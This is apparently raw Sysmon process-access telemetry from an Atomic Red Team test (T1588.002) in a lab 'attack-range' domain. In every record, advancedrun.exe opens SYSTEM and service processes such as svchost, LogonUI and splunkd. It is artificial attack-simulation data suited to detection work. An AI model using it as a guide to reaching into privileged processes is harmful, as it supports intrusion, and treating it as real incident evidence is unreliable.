17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983056Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983054Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983053Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983052Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983051Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983050Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983049Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983048Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003983047Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983046Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983045Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983044Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983043Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983042Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983041Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983039Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
